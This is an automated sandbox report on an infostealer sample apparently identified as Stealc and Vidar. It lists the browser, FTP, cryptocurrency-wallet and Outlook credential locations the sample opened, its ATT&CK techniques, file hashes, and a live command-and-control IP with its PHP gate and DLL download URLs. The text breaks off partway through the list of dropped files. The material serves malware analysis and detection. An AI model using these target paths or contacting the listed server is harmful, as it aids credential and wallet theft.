Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1669710829.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	335 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	641 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37	100%	URL Reputation	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true		unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/a	file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/chrome_newtab	DAKJDAAF.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	EHIIIJDAAAAAAKECBFBAEBKJJJ.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	DAKJDAAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllE	file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1915277193.00000000298C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, GCFHDAKECFIDGDGDBKJD.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	DAKJDAAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000003.1756066006.000000001D88C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpl	file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phphN	file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpCoinomi	file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dllW	file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	GCFHDAKECFIDGDGDBKJD.0.dr	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Visual	file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	false		unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	DAKJDAAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php_	file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllB	file.exe, 00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1915277193.00000000298C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, GCFHDAKECFIDGDGDBKJD.0.dr	false		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1919078277.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1909956473.000000001D98D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37m	file.exe, 00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll-	file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.1919651984.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	file.exe, 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1915277193.00000000298C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, GCFHDAKECFIDGDGDBKJD.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	DAKJDAAF.0.dr	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	file.exe, 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	DAKJDAAF.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1915277193.00000000298C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, GCFHDAKECFIDGDGDBKJD.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpus.wallet	file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, file.exe, 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1756066006.000000001D88C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	DAKJDAAF.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	EHIIIJDAAAAAAKECBFBAEBKJJJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpI	file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpH	file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllw	file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ac.ecosia.org/autocomplete?q=	DAKJDAAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpEBGDAFHJEBGDGIJDH	file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1915277193.00000000298C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, GCFHDAKECFIDGDGDBKJD.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php9	file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org	EHIIIJDAAAAAAKECBFBAEBKJJJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpHDAKECFIDGDGDBKJD	file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	DAKJDAAF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php)	file.exe, 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpECBFIDGDAKFHIEHJK	file.exe, 00000000.00000002.1896811393.0000000001466000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522463
Start date and time:	2024-09-30 07:07:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 85% Number of executed functions: 75 Number of non-executed functions: 46
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	SecuriteInfo.com.Win32.Evo-gen.16378.4678.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	SecuriteInfo.com.Win32.Evo-gen.16378.4678.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.103
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.103
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse

Created / dropped Files

C:\ProgramData\BKJJJDHD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFIECBFIDGDAKFHIEHJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAKJDAAF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
